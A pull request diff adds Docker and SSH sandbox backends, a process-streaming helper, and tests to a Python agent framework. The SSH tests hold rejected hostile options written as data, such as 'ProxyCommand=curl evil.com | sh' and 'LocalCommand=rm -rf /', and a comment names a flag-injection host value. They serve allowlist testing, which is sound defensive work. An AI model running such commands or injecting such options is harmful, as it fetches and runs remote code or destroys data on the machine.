### PR TITLE
feat(python): add Docker/SSH Sandbox implementations

### DIFF
--- a/strands-py/src/strands/sandbox/__init__.py
+++ b/strands-py/src/strands/sandbox/__init__.py
@@ -1,7 +1,7 @@
 """Sandbox abstraction for agent code-execution environments.
 
 A :class:`Sandbox` provides the runtime context where tools execute code, run
-commands, and interact with a filesystem. This module ports the *core* sandbox
+commands, and interact with a filesystem. This module ports the sandbox
 interface from ``strands-ts/src/sandbox/`` (the behavioral oracle):
 
 - :class:`Sandbox` — the abstract base with streaming primitives and
@@ -9,20 +9,17 @@ interface from ``strands-ts/src/sandbox/`` (the behavioral oracle):
 - :class:`PosixShellSandbox` — an abstract sandbox that implements file and code
   operations via shell commands; subclasses implement only
   :meth:`~strands.sandbox.base.Sandbox.execute_streaming`.
+- :class:`DockerSandbox` — run commands in a Docker container via ``docker exec``.
+- :class:`SshSandbox` — run commands on a remote host via OpenSSH.
 - Data types: :class:`StreamChunk`, :class:`FileInfo`, :class:`OutputFile`,
   :class:`ExecutionResult`, and the :data:`StreamType` literal.
 - :data:`LANGUAGE_PATTERN` — interpreter-name validation pattern.
-
-Concrete shell backends (Docker, SSH) and the Agent↔Sandbox integration are
-intentionally out of scope for this "core only (1/N)" port; they follow as
-separate PRs mirroring the corresponding TypeScript modules.
 
 .. note::
    Per the "Prefer Flat Namespaces Over Nested Modules" decision record, the
    commonly-used symbols here will be re-exported from the top-level ``strands``
    package. That re-export is deferred to the Agent↔Sandbox integration
-   follow-up (where the public surface stabilizes), so it is not added in this
-   core-only PR.
+   follow-up (where the public surface stabilizes).
 
 Example:
     A minimal shell-backed sandbox needs only ``execute_streaming``::
@@ -36,16 +33,20 @@ Example:
 
 from .base import Sandbox
 from .constants import LANGUAGE_PATTERN
+from .docker import DockerSandbox
 from .shell import PosixShellSandbox
+from .ssh import SshSandbox
 from .types import ExecutionResult, FileInfo, OutputFile, StreamChunk, StreamType
 
 __all__ = [
+    "DockerSandbox",
     "ExecutionResult",
     "FileInfo",
     "LANGUAGE_PATTERN",
     "OutputFile",
     "PosixShellSandbox",
     "Sandbox",
+    "SshSandbox",
     "StreamChunk",
     "StreamType",
 ]

--- a/strands-py/src/strands/sandbox/docker.py
+++ b/strands-py/src/strands/sandbox/docker.py
@@ -1,0 +1,92 @@
+"""Docker sandbox -- executes commands in a Docker container via ``docker exec``.
+
+Mirrors ``strands-ts/src/sandbox/docker.ts``.
+"""
+
+from collections.abc import AsyncGenerator
+from typing import Any
+
+from .shell import PosixShellSandbox, validate_env_keys
+from .stream_process import stream_process
+from .types import ExecutionResult, StreamChunk
+
+
+class DockerSandbox(PosixShellSandbox):
+    """Execute commands in a Docker container via ``docker exec``.
+
+    A thin :class:`PosixShellSandbox` backend: file and code operations are
+    inherited (run as shell commands), and only :meth:`execute_streaming` is
+    implemented, building the ``docker exec`` argv.
+    """
+
+    def __init__(self, container: str, *, working_dir: str | None = None, user: str | None = None) -> None:
+        """Initialize the Docker sandbox.
+
+        Args:
+            container: ID or name of a running Docker container.
+            working_dir: Working directory for executed commands. If ``None``, no
+                ``-w`` flag is set and commands run in the container's configured
+                working directory. The path must exist and be writable by the
+                effective ``user``.
+            user: User to run commands as, in ``"uid"``, ``"uid:gid"``, or
+                ``"name"`` form. If ``None``, no ``--user`` flag is set and
+                commands run as the container's configured user.
+        """
+        self.container = container
+        self.working_dir = working_dir
+        self._user = user
+
+    async def execute_streaming(
+        self,
+        command: str,
+        *,
+        timeout: float | None = None,
+        cwd: str | None = None,
+        env: dict[str, str] | None = None,
+        **kwargs: Any,
+    ) -> AsyncGenerator[StreamChunk | ExecutionResult, None]:
+        """Execute a command in the container, streaming output.
+
+        Args:
+            command: The shell command to execute.
+            timeout: Maximum execution time in seconds. ``None`` means no timeout.
+            cwd: Working directory for this command, overriding ``working_dir``.
+            env: Environment variables to set, passed as ``docker exec -e`` flags.
+            **kwargs: Additional keyword arguments for forward compatibility.
+
+        Yields:
+            :class:`StreamChunk` objects for output, then a final
+            :class:`ExecutionResult`.
+
+        Raises:
+            ValueError: If an environment variable name is invalid.
+            TimeoutError: If execution exceeds ``timeout`` seconds.
+        """
+        args = ["exec"]
+
+        # An unset user/cwd defers to the container's own configuration.
+        if self._user is not None:
+            args += ["--user", self._user]
+
+        effective_cwd = cwd if cwd is not None else self.working_dir
+        if effective_cwd is not None:
+            args += ["-w", effective_cwd]
+
+        if env:
+            validate_env_keys(env)
+            for key, value in env.items():
+                # Values are passed as process argv (not through a shell), so no escaping
+                # is needed -- Docker stores them verbatim. This is why values are not
+                # shell-quoted here, unlike the SSH backend which builds a shell string.
+                args += ["-e", f"{key}={value}"]
+
+        # docker exec requires the container and command after all flags. '--' terminates
+        # flag parsing so the container is always treated as a positional argument; without
+        # it, a name like '--privileged' would be parsed as a flag and override the options
+        # above.
+        args += ["--", self.container, "sh", "-c", command]
+
+        async for chunk in stream_process(
+            "docker", args, timeout=timeout, enoent_message="docker is not installed or not on PATH"
+        ):
+            yield chunk

--- a/strands-py/src/strands/sandbox/ssh.py
+++ b/strands-py/src/strands/sandbox/ssh.py
@@ -1,0 +1,175 @@
+"""SSH sandbox -- executes commands on a remote host via OpenSSH.
+
+Mirrors ``strands-ts/src/sandbox/ssh.ts``.
+"""
+
+import re
+import shlex
+from collections.abc import AsyncGenerator
+from typing import Any
+
+from .shell import PosixShellSandbox, build_shell_env_prefix
+from .stream_process import stream_process
+from .types import ExecutionResult, StreamChunk
+
+# Known-safe SSH options. Options that execute commands, tunnel traffic, or load
+# external config are excluded. Reviewed and approved by AppSec.
+# Full option reference: https://man.openbsd.org/ssh_config
+_ALLOWED_SSH_OPTIONS = frozenset(
+    {
+        "addressfamily",
+        "bindaddress",
+        "bindinterface",
+        "canonicaldomains",
+        "canonicalizefallbacklocal",
+        "canonicalizehostname",
+        "canonicalizemaxdots",
+        "canonicalizepermittedcnames",
+        "checkhostip",
+        "ciphers",
+        "compression",
+        "connectionattempts",
+        "connecttimeout",
+        "hostkeyalgorithms",
+        "hostname",
+        "identitiesonly",
+        "ipqos",
+        "kbdinteractiveauthentication",
+        "kexalgorithms",
+        "loglevel",
+        "macs",
+        "numberofpasswordprompts",
+        "passwordauthentication",
+        "port",
+        "preferredauthentications",
+        "pubkeyacceptedalgorithms",
+        "pubkeyauthentication",
+        "rekeylimit",
+        "serveralivecountmax",
+        "serveraliveinterval",
+        "tcpkeepalive",
+        "updatehostkeys",
+        "user",
+        "verifyhostkeydns",
+    }
+)
+
+# Splits an SSH option on its first '=' or whitespace to isolate the option name,
+# e.g. "ConnectTimeout=10" or 'Match exec "..."' -> the leading token.
+_SSH_OPTION_NAME = re.compile(r"[=\s]")
+
+
+class SshSandbox(PosixShellSandbox):
+    """Execute commands on a remote host via SSH.
+
+    A thin :class:`PosixShellSandbox` backend: file and code operations are
+    inherited (run as shell commands), and only :meth:`execute_streaming` is
+    implemented, building the ``ssh`` argv.
+
+    Stateless -- each :meth:`execute_streaming` call spawns a fresh ``ssh``
+    process. All sessions use ``BatchMode=yes``, so interactive prompts are
+    disabled and authentication must be key-based.
+    """
+
+    def __init__(
+        self,
+        host: str,
+        *,
+        working_dir: str,
+        identity_file: str | None = None,
+        port: int = 22,
+        ssh_options: list[str] | None = None,
+        allow_unknown_hosts: bool = False,
+        allow_unsafe_ssh_options: bool = False,
+    ) -> None:
+        """Initialize the SSH sandbox.
+
+        Args:
+            host: SSH destination (e.g. ``"user@host"``, ``"192.168.1.10"``).
+            working_dir: Working directory on the remote host.
+            identity_file: Path to an SSH private key file.
+            port: SSH port. Defaults to 22.
+            ssh_options: Additional SSH options passed as ``-o`` flags.
+            allow_unknown_hosts: Allow connections to hosts with unknown or
+                changed SSH keys. When ``False`` (default), uses
+                ``StrictHostKeyChecking=accept-new`` (trust on first connect,
+                reject if the key changes). When ``True``, uses
+                ``StrictHostKeyChecking=no`` (host key verification disabled).
+            allow_unsafe_ssh_options: Bypass the SSH option allowlist. When
+                ``False`` (default), unknown options raise at construction. When
+                ``True``, all options pass through without validation.
+
+        Raises:
+            ValueError: If ``ssh_options`` contains an option not on the
+                allowlist and ``allow_unsafe_ssh_options`` is ``False``.
+        """
+        self.host = host
+        self.working_dir = working_dir
+        self._identity_file = identity_file
+        self._port = port
+        self._allow_unknown_hosts = allow_unknown_hosts
+        self._ssh_options = ssh_options or []
+
+        if not allow_unsafe_ssh_options:
+            for opt in self._ssh_options:
+                name = _SSH_OPTION_NAME.split(opt, maxsplit=1)[0]
+                if name.lower() not in _ALLOWED_SSH_OPTIONS:
+                    raise ValueError(
+                        f'SSH option "{name}" is not allowed. Set allow_unsafe_ssh_options=True to bypass.'
+                    )
+
+    async def execute_streaming(
+        self,
+        command: str,
+        *,
+        timeout: float | None = None,
+        cwd: str | None = None,
+        env: dict[str, str] | None = None,
+        **kwargs: Any,
+    ) -> AsyncGenerator[StreamChunk | ExecutionResult, None]:
+        """Execute a command on the remote host, streaming output.
+
+        Args:
+            command: The shell command to execute.
+            timeout: Maximum execution time in seconds. ``None`` means no timeout.
+            cwd: Working directory for this command, overriding ``working_dir``.
+            env: Environment variables to set, applied via a shell ``export`` prefix.
+            **kwargs: Additional keyword arguments for forward compatibility.
+
+        Yields:
+            :class:`StreamChunk` objects for output, then a final
+            :class:`ExecutionResult`.
+
+        Raises:
+            ValueError: If an environment variable name is invalid.
+            TimeoutError: If execution exceeds ``timeout`` seconds.
+        """
+        effective_cwd = cwd if cwd is not None else self.working_dir
+        env_prefix = build_shell_env_prefix(env)
+        remote_command = f"cd {shlex.quote(effective_cwd)} && {env_prefix}{command}"
+
+        args = [
+            "-o",
+            f"StrictHostKeyChecking={'no' if self._allow_unknown_hosts else 'accept-new'}",
+            "-o",
+            "BatchMode=yes",
+            "-p",
+            str(self._port),
+        ]
+
+        if self._identity_file:
+            args += ["-i", self._identity_file]
+
+        for opt in self._ssh_options:
+            args += ["-o", opt]
+
+        # ssh requires the hostname and command after all flags. '--' terminates flag
+        # parsing so the host is always treated as a positional argument; without it, a
+        # host like '-oProxyCommand=evil' would be parsed as a flag, enabling arbitrary
+        # command execution on the local machine.
+        args += ["--", self.host, remote_command]
+
+        async for chunk in stream_process(
+            "ssh", args, timeout=timeout, enoent_message="ssh is not installed or not on PATH"
+        ):
+            yield chunk

--- a/strands-py/src/strands/sandbox/stream_process.py
+++ b/strands-py/src/strands/sandbox/stream_process.py
@@ -1,0 +1,132 @@
+"""Spawn a process and stream its stdout/stderr as an async generator.
+
+Mirrors ``strands-ts/src/sandbox/stream-process.ts``.
+
+The shared process-supervision engine behind the shell-based backends (Docker,
+SSH): a backend builds an argv, and this spawns the process, streams its output
+as :class:`StreamChunk` objects, and yields a final :class:`ExecutionResult`.
+
+Cancellation is cooperative -- cancelling the consuming task (or closing the
+generator) runs the cleanup in ``finally``, which kills the process. ``timeout``
+is wall-clock: measured from spawn and not reset by ongoing output.
+"""
+
+import asyncio
+import contextlib
+import os
+import signal
+from collections.abc import AsyncGenerator
+
+from .types import ExecutionResult, StreamChunk, StreamType
+
+_READ_CHUNK_SIZE = 65536
+_SIGNAL_EXIT_BASE = 128
+
+# The child is spawned in its own process group (start_new_session) so the whole
+# tree can be killed at once. Without this, "sh -c 'cmd; sleep 60'" leaves the
+# sleep child holding the pipe write-end open after the parent dies, so the
+# readers never see EOF and the generator hangs.
+_USE_PROCESS_GROUP = hasattr(os, "killpg")
+
+
+def _kill_tree(proc: asyncio.subprocess.Process) -> None:
+    """SIGKILL the entire process tree (the group on POSIX, the lone process elsewhere)."""
+    with contextlib.suppress(ProcessLookupError, PermissionError):
+        if _USE_PROCESS_GROUP:
+            os.killpg(proc.pid, signal.SIGKILL)
+        else:
+            proc.kill()
+
+
+async def stream_process(
+    program: str,
+    args: list[str],
+    *,
+    timeout: float | None = None,
+    enoent_message: str | None = None,
+) -> AsyncGenerator[StreamChunk | ExecutionResult, None]:
+    """Spawn a command and stream its stdout/stderr, yielding the final result.
+
+    Yields :class:`StreamChunk` objects as output arrives, then a single final
+    :class:`ExecutionResult`. Signal termination maps to ``128 + signal`` (e.g.
+    SIGKILL -> 137). Cancelling the consuming task kills the process.
+
+    Args:
+        program: The binary to spawn (e.g. ``"docker"``, ``"ssh"``).
+        args: Arguments to pass to the binary.
+        timeout: Maximum wall-clock execution time in seconds, measured from
+            spawn (not reset by output). ``None`` means no timeout.
+        enoent_message: Message to surface as ``stderr`` (with exit code 127)
+            when ``program`` is not on PATH. If ``None``, the underlying
+            :class:`FileNotFoundError` propagates instead.
+
+    Yields:
+        :class:`StreamChunk` objects for output, then a final
+        :class:`ExecutionResult`.
+
+    Raises:
+        TimeoutError: If execution exceeds ``timeout`` seconds.
+        FileNotFoundError: If ``program`` is not found and ``enoent_message`` is ``None``.
+    """
+    try:
+        proc = await asyncio.create_subprocess_exec(
+            program,
+            *args,
+            stdout=asyncio.subprocess.PIPE,
+            stderr=asyncio.subprocess.PIPE,
+            start_new_session=_USE_PROCESS_GROUP,
+        )
+    except FileNotFoundError:
+        if enoent_message is None:
+            raise
+        yield ExecutionResult(exit_code=127, stdout="", stderr=enoent_message)
+        return
+
+    queue: asyncio.Queue[StreamChunk | None] = asyncio.Queue()
+    out_buf: list[str] = []
+    err_buf: list[str] = []
+    timed_out = False
+
+    async def pump(stream: asyncio.StreamReader, stream_type: StreamType, buf: list[str]) -> None:
+        while data := await stream.read(_READ_CHUNK_SIZE):
+            text = data.decode(errors="replace")
+            buf.append(text)
+            await queue.put(StreamChunk(data=text, stream_type=stream_type))
+
+    assert proc.stdout is not None and proc.stderr is not None
+    pumps = asyncio.gather(pump(proc.stdout, "stdout", out_buf), pump(proc.stderr, "stderr", err_buf))
+
+    async def reader() -> None:
+        await pumps
+        await proc.wait()
+        await queue.put(None)
+
+    async def enforce_timeout(timeout: float) -> None:
+        nonlocal timed_out
+        await asyncio.sleep(timeout)
+        if proc.returncode is None:
+            timed_out = True
+            _kill_tree(proc)
+            await queue.put(None)  # signal the consumer loop to stop
+
+    tasks = [asyncio.ensure_future(reader())]
+    if timeout is not None:
+        tasks.append(asyncio.ensure_future(enforce_timeout(timeout)))
+
+    try:
+        while (item := await queue.get()) is not None:
+            yield item
+
+        if timed_out:
+            raise TimeoutError(f"Execution timed out after {timeout} seconds")
+
+        returncode = proc.returncode if proc.returncode is not None else 1
+        exit_code = _SIGNAL_EXIT_BASE - returncode if returncode < 0 else returncode
+        yield ExecutionResult(exit_code=exit_code, stdout="".join(out_buf), stderr="".join(err_buf))
+    finally:
+        if proc.returncode is None:
+            _kill_tree(proc)
+        pumps.cancel()
+        for task in tasks:
+            task.cancel()
+        await asyncio.gather(pumps, *tasks, return_exceptions=True)

--- a/strands-py/tests/strands/sandbox/test_docker.py
+++ b/strands-py/tests/strands/sandbox/test_docker.py
@@ -1,0 +1,98 @@
+"""Tests for :class:`~strands.sandbox.docker.DockerSandbox`.
+
+Mirrors ``strands-ts/src/sandbox/__tests__/docker.test.node.ts``. These tests
+assert the ``docker exec`` argv the sandbox builds; the process pump
+(``stream_process``) is mocked, so no Docker daemon is required.
+"""
+
+import unittest.mock
+
+import pytest
+
+from strands.sandbox import DockerSandbox
+from strands.sandbox.types import ExecutionResult
+
+
+@pytest.fixture
+def mock_stream_process(agenerator):
+    """Patch ``stream_process`` in the docker module, returning a no-op result.
+
+    Yields the mock so tests can inspect the ``(program, args, kwargs)`` it was
+    called with via ``mock.call_args``.
+    """
+    with unittest.mock.patch("strands.sandbox.docker.stream_process") as mock:
+        mock.return_value = agenerator([ExecutionResult(exit_code=0, stdout="", stderr="")])
+        yield mock
+
+
+def _args(mock_stream_process) -> list[str]:
+    """The argv passed to ``stream_process`` (its second positional argument)."""
+    return mock_stream_process.call_args.args[1]
+
+
+@pytest.mark.asyncio
+async def test_terminates_flags_with_double_dash(mock_stream_process):
+    # A dash-prefixed container must be positional after '--', not parsed as a flag.
+    await DockerSandbox("--privileged").execute("echo hi")
+    assert _args(mock_stream_process)[-5:] == ["--", "--privileged", "sh", "-c", "echo hi"]
+
+
+@pytest.mark.asyncio
+async def test_omits_user_and_workdir_when_unset(mock_stream_process):
+    await DockerSandbox("my-container").execute("echo hi")
+    assert _args(mock_stream_process) == ["exec", "--", "my-container", "sh", "-c", "echo hi"]
+
+
+@pytest.mark.asyncio
+async def test_uses_custom_user_and_working_dir(mock_stream_process):
+    await DockerSandbox("my-container", user="root", working_dir="/app").execute("ls")
+    assert _args(mock_stream_process) == [
+        "exec",
+        "--user",
+        "root",
+        "-w",
+        "/app",
+        "--",
+        "my-container",
+        "sh",
+        "-c",
+        "ls",
+    ]
+
+
+@pytest.mark.asyncio
+async def test_cwd_option_overrides_working_dir(mock_stream_process):
+    await DockerSandbox("my-container", working_dir="/app").execute("pwd", cwd="/override")
+    assert _args(mock_stream_process) == ["exec", "-w", "/override", "--", "my-container", "sh", "-c", "pwd"]
+
+
+@pytest.mark.asyncio
+async def test_passes_env_as_e_flags_before_container(mock_stream_process):
+    await DockerSandbox("my-container").execute("echo $FOO", env={"FOO": "bar", "BAZ": "qux"})
+    assert _args(mock_stream_process) == [
+        "exec",
+        "-e",
+        "FOO=bar",
+        "-e",
+        "BAZ=qux",
+        "--",
+        "my-container",
+        "sh",
+        "-c",
+        "echo $FOO",
+    ]
+
+
+@pytest.mark.asyncio
+async def test_forwards_timeout_and_enoent_message(mock_stream_process):
+    await DockerSandbox("my-container").execute("sleep 10", timeout=5)
+    assert mock_stream_process.call_args.kwargs == {
+        "timeout": 5,
+        "enoent_message": "docker is not installed or not on PATH",
+    }
+
+
+@pytest.mark.asyncio
+async def test_rejects_invalid_env_var_names(mock_stream_process):
+    with pytest.raises(ValueError, match="Invalid environment variable name"):
+        await DockerSandbox("my-container").execute("cmd", env={"FOO=bar BAZ": "val"})

--- a/strands-py/tests/strands/sandbox/test_ssh.py
+++ b/strands-py/tests/strands/sandbox/test_ssh.py
@@ -1,0 +1,186 @@
+"""Tests for :class:`~strands.sandbox.ssh.SshSandbox`.
+
+Mirrors ``strands-ts/src/sandbox/__tests__/ssh.test.node.ts``. These tests assert
+the ``ssh`` argv the sandbox builds and the SSH-option allowlist; the process
+pump (``stream_process``) is mocked, so no remote host is required.
+
+The remote command strings use stdlib ``shlex.quote`` (the core port's choice
+over the oracle's hand-rolled ``shellQuote``). The two render shell-equivalent
+output, but differ byte-for-byte: ``shlex.quote`` only adds quotes when a value
+contains shell-special characters, so e.g. ``cd /w`` here vs ``cd '/w'`` in the
+oracle. Expectations below assert the ``shlex`` form.
+"""
+
+import unittest.mock
+
+import pytest
+
+from strands.sandbox import SshSandbox
+from strands.sandbox.types import ExecutionResult
+
+# Leading SSH flags shared by every invocation, with default host-key checking.
+BASE = ["-o", "StrictHostKeyChecking=accept-new", "-o", "BatchMode=yes", "-p", "22"]
+
+
+@pytest.fixture
+def mock_stream_process(agenerator):
+    """Patch ``stream_process`` in the ssh module, returning a no-op result."""
+    with unittest.mock.patch("strands.sandbox.ssh.stream_process") as mock:
+        mock.return_value = agenerator([ExecutionResult(exit_code=0, stdout="", stderr="")])
+        yield mock
+
+
+def _args(mock_stream_process) -> list[str]:
+    """The argv passed to ``stream_process`` (its second positional argument)."""
+    return mock_stream_process.call_args.args[1]
+
+
+# ---- constructor ----
+
+
+def test_stores_host_and_working_dir():
+    sandbox = SshSandbox("myhost", working_dir="/workspace")
+    assert sandbox.host == "myhost"
+    assert sandbox.working_dir == "/workspace"
+
+
+# ---- SSH option allowlist ----
+
+
+def test_permits_known_safe_options():
+    SshSandbox("h", working_dir="/w", ssh_options=["ConnectTimeout=10", "ServerAliveInterval=60", "Compression=yes"])
+
+
+@pytest.mark.parametrize(
+    "option",
+    [
+        "ProxyCommand=curl evil.com | sh",
+        "Include=/tmp/evil.conf",
+        'Match exec "curl evil.com"',
+        "LocalCommand=rm -rf /",
+        "LocalForward=8080:localhost:80",
+        "RemoteForward=9090:internal:80",
+        "DynamicForward=1080",
+    ],
+)
+def test_rejects_unsafe_options(option):
+    with pytest.raises(ValueError, match="not allowed"):
+        SshSandbox("h", working_dir="/w", ssh_options=[option])
+
+
+@pytest.mark.parametrize("option", ["proxycommand=evil", "PROXYCOMMAND=evil"])
+def test_allowlist_is_case_insensitive(option):
+    with pytest.raises(ValueError, match="not allowed"):
+        SshSandbox("h", working_dir="/w", ssh_options=[option])
+
+
+def test_allow_unsafe_ssh_options_bypasses_validation():
+    SshSandbox("h", working_dir="/w", ssh_options=["ProxyCommand=anything"], allow_unsafe_ssh_options=True)
+
+
+# ---- argv construction ----
+
+
+@pytest.mark.asyncio
+async def test_builds_default_args(mock_stream_process):
+    await SshSandbox("user@server.com", working_dir="/remote/path").execute("echo hi")
+    assert _args(mock_stream_process) == BASE + ["--", "user@server.com", "cd /remote/path && echo hi"]
+
+
+@pytest.mark.asyncio
+async def test_allow_unknown_hosts_disables_strict_checking(mock_stream_process):
+    await SshSandbox("h", working_dir="/w", allow_unknown_hosts=True).execute("ls")
+    assert _args(mock_stream_process) == [
+        "-o",
+        "StrictHostKeyChecking=no",
+        "-o",
+        "BatchMode=yes",
+        "-p",
+        "22",
+        "--",
+        "h",
+        "cd /w && ls",
+    ]
+
+
+@pytest.mark.asyncio
+async def test_includes_identity_file(mock_stream_process):
+    await SshSandbox("h", working_dir="/w", identity_file="/home/user/.ssh/key").execute("ls")
+    assert _args(mock_stream_process) == BASE + ["-i", "/home/user/.ssh/key", "--", "h", "cd /w && ls"]
+
+
+@pytest.mark.asyncio
+async def test_uses_custom_port(mock_stream_process):
+    await SshSandbox("h", working_dir="/w", port=2222).execute("ls")
+    assert _args(mock_stream_process) == [
+        "-o",
+        "StrictHostKeyChecking=accept-new",
+        "-o",
+        "BatchMode=yes",
+        "-p",
+        "2222",
+        "--",
+        "h",
+        "cd /w && ls",
+    ]
+
+
+@pytest.mark.asyncio
+async def test_appends_user_ssh_options(mock_stream_process):
+    await SshSandbox("h", working_dir="/w", ssh_options=["ConnectTimeout=5", "ServerAliveInterval=30"]).execute("ls")
+    assert _args(mock_stream_process) == BASE + [
+        "-o",
+        "ConnectTimeout=5",
+        "-o",
+        "ServerAliveInterval=30",
+        "--",
+        "h",
+        "cd /w && ls",
+    ]
+
+
+@pytest.mark.asyncio
+async def test_quotes_cwd_with_special_characters(mock_stream_process):
+    # A path with spaces and an embedded single quote exercises the shlex escaping path:
+    # shlex closes the quote, inserts an escaped quote ('"'"'), and reopens.
+    await SshSandbox("h", working_dir="/path/with spaces/and'quotes").execute("ls")
+    assert _args(mock_stream_process) == BASE + [
+        "--",
+        "h",
+        "cd '/path/with spaces/and'\"'\"'quotes' && ls",
+    ]
+
+
+@pytest.mark.asyncio
+async def test_uses_cwd_option_when_provided(mock_stream_process):
+    await SshSandbox("h", working_dir="/default").execute("ls", cwd="/override")
+    assert _args(mock_stream_process) == BASE + ["--", "h", "cd /override && ls"]
+
+
+@pytest.mark.asyncio
+async def test_prefixes_command_with_env_vars(mock_stream_process):
+    await SshSandbox("h", working_dir="/w").execute("echo $FOO", env={"FOO": "bar", "BAZ": "qux"})
+    assert _args(mock_stream_process) == BASE + ["--", "h", "cd /w && export FOO=bar BAZ=qux && echo $FOO"]
+
+
+@pytest.mark.asyncio
+async def test_quotes_env_values_with_metacharacters(mock_stream_process):
+    # An env value containing shell metacharacters must be quoted so it reaches the
+    # remote shell literally, never expanded.
+    await SshSandbox("h", working_dir="/w").execute("echo $FOO", env={"FOO": "$(whoami)"})
+    assert _args(mock_stream_process) == BASE + ["--", "h", "cd /w && export FOO='$(whoami)' && echo $FOO"]
+
+
+@pytest.mark.asyncio
+async def test_forwards_timeout_and_enoent_message(mock_stream_process):
+    await SshSandbox("h", working_dir="/w").execute("ls", timeout=5)
+    assert mock_stream_process.call_args.kwargs == {
+        "timeout": 5,
+        "enoent_message": "ssh is not installed or not on PATH",
+    }
+
+
+@pytest.mark.asyncio
+async def test_rejects_invalid_env_var_names(mock_stream_process):
+    with pytest.raises(ValueError, match="Invalid environment variable name"):
+        await SshSandbox("h", working_dir="/w").execute("cmd", env={"FOO=bar BAZ": "val"})

--- a/strands-py/tests/strands/sandbox/test_stream_process.py
+++ b/strands-py/tests/strands/sandbox/test_stream_process.py
@@ -1,0 +1,128 @@
+"""Tests for :func:`~strands.sandbox.stream_process.stream_process`.
+
+The shared process pump behind the Docker and SSH backends. Its timeout,
+cancellation, and signal-to-exit-code handling diverge from the TypeScript
+oracle (asyncio cancellation, wall-clock timeout, negative ``returncode``), so
+it is exercised directly here. These tests spawn ``sh`` and require a POSIX
+shell, so they are skipped on Windows.
+"""
+
+import asyncio
+import os
+import sys
+
+import pytest
+
+from strands.sandbox.stream_process import stream_process
+from strands.sandbox.types import ExecutionResult, StreamChunk
+
+pytestmark = pytest.mark.skipif(sys.platform == "win32", reason="POSIX shell required")
+
+
+async def _collect(gen) -> tuple[list[StreamChunk], ExecutionResult | None]:
+    """Drain a stream_process generator into (stream_chunks, final_result)."""
+    chunks: list[StreamChunk] = []
+    result: ExecutionResult | None = None
+    async for item in gen:
+        if isinstance(item, ExecutionResult):
+            result = item
+        else:
+            chunks.append(item)
+    return chunks, result
+
+
+@pytest.mark.asyncio
+async def test_captures_stdout_stderr_and_exit_code():
+    chunks, result = await _collect(stream_process("sh", ["-c", "echo out; echo err >&2; exit 3"]))
+    assert result == ExecutionResult(exit_code=3, stdout="out\n", stderr="err\n")
+    # Output is also delivered incrementally as typed chunks.
+    assert any(c.stream_type == "stdout" and "out" in c.data for c in chunks)
+    assert any(c.stream_type == "stderr" and "err" in c.data for c in chunks)
+
+
+@pytest.mark.asyncio
+@pytest.mark.parametrize("code", [0, 1, 2, 42, 255])
+async def test_exit_codes_preserved(code):
+    _, result = await _collect(stream_process("sh", ["-c", f"exit {code}"]))
+    assert result.exit_code == code
+
+
+@pytest.mark.asyncio
+async def test_signal_termination_maps_to_128_plus_signal():
+    # The shell kills itself with SIGKILL (9); Python reports returncode -9 -> 137.
+    _, result = await _collect(stream_process("sh", ["-c", "kill -9 $$"]))
+    assert result.exit_code == 137
+
+
+@pytest.mark.asyncio
+async def test_timeout_is_wall_clock_even_with_steady_output():
+    # A command that emits output continuously must still be killed at the deadline:
+    # the timeout is measured from spawn, not reset per chunk.
+    loop = asyncio.get_event_loop()
+    start = loop.time()
+    with pytest.raises(TimeoutError, match="timed out after 0.3 seconds"):
+        await _collect(stream_process("sh", ["-c", "while true; do echo x; sleep 0.02; done"], timeout=0.3))
+    assert loop.time() - start < 3
+
+
+@pytest.mark.asyncio
+async def test_timeout_kills_child_processes_that_outlive_the_parent():
+    # Regression: "sh -c 'echo hi; sleep 60'" spawns a child (sleep) that inherits the
+    # pipe fds. If we only kill the parent sh, the child holds the write-end open, the
+    # pipe readers never see EOF, and the generator hangs. The fix is to kill the whole
+    # process group.
+    loop = asyncio.get_event_loop()
+    start = loop.time()
+    with pytest.raises(TimeoutError, match="timed out after 0.5 seconds"):
+        await _collect(stream_process("sh", ["-c", "echo hi; sleep 60"], timeout=0.5))
+    assert loop.time() - start < 3
+
+
+@pytest.mark.asyncio
+async def test_fast_command_completes_under_timeout():
+    _, result = await _collect(stream_process("sh", ["-c", "echo fast"], timeout=5))
+    assert result.exit_code == 0
+    assert result.stdout == "fast\n"
+
+
+@pytest.mark.asyncio
+async def test_enoent_with_message_returns_127():
+    _, result = await _collect(
+        stream_process("definitely_not_a_real_binary_xyz", [], enoent_message="nope not installed")
+    )
+    assert result.exit_code == 127
+    assert result.stderr == "nope not installed"
+
+
+@pytest.mark.asyncio
+async def test_enoent_without_message_propagates():
+    with pytest.raises(FileNotFoundError):
+        await _collect(stream_process("definitely_not_a_real_binary_xyz", []))
+
+
+@pytest.mark.asyncio
+async def test_cancellation_kills_the_process():
+    # Print the child PID, then cancel the consuming task and confirm the OS process is reaped.
+    pid_box: dict[str, int] = {}
+
+    async def consume() -> None:
+        async for item in stream_process("sh", ["-c", "echo $$; sleep 60"]):
+            if isinstance(item, StreamChunk) and item.data.strip().isdigit():
+                pid_box["pid"] = int(item.data.strip())
+
+    task = asyncio.ensure_future(consume())
+    while "pid" not in pid_box:
+        await asyncio.sleep(0.02)
+    task.cancel()
+    with pytest.raises(asyncio.CancelledError):
+        await task
+
+    # Give the finally-block kill a moment to land, then assert the PID is gone.
+    for _ in range(50):
+        try:
+            os.kill(pid_box["pid"], 0)
+        except ProcessLookupError:
+            break
+        await asyncio.sleep(0.02)
+    else:
+        pytest.fail("process survived cancellation")

--- a/strands-py/tests_integ/sandbox/test_docker.py
+++ b/strands-py/tests_integ/sandbox/test_docker.py
@@ -1,0 +1,131 @@
+"""Integration tests for :class:`~strands.sandbox.DockerSandbox`.
+
+Mirrors ``strands-ts/test/integ/sandbox/docker.test.node.ts``. These run real
+``docker exec`` commands against a throwaway ``alpine`` container, so they are
+skipped unless a working Docker daemon is reachable.
+"""
+
+import secrets
+import subprocess
+import sys
+from collections.abc import Iterator
+
+import pytest
+
+from strands.sandbox import DockerSandbox
+
+
+def _docker_available() -> bool:
+    if sys.platform == "win32":
+        return False
+    try:
+        return subprocess.run(["docker", "info"], capture_output=True).returncode == 0
+    except FileNotFoundError:
+        return False
+
+
+pytestmark = [
+    pytest.mark.skipif(not _docker_available(), reason="Docker daemon not available"),
+    pytest.mark.asyncio,
+]
+
+# Unique suffix so concurrent runs (CI matrix, or local + CI) don't collide on the name.
+CONTAINER_NAME = f"strands-integ-docker-sandbox-{secrets.token_hex(3)}"
+
+
+@pytest.fixture(scope="module")
+def container() -> Iterator[str]:
+    """Start a throwaway alpine container for the module, removing it afterward.
+
+    alpine (busybox) is tiny and ships ``sh`` + ``base64``, which is all these
+    tests need; ``execute_code`` runs via ``sh``.
+    """
